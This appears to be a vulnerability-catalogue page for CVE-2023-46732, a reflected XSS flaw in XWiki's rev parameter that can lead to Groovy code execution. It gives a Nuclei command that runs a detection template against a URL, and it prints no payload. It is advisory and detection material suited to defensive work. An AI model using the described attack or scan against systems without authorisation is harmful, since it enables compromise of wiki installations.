.. / CVE-2023-46732

Exploit for XWiki < 14.10.14 - Cross-Site Scripting (CVE-2023-46732)

Description:

XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation.

Nuclei Template

View the template here CVE-2023-46732.yaml

Validate with Nuclei

echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2023/CVE-2023-46732.yaml
Copy

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-46732
https://jira.xwiki.org/browse/XWIKI-21095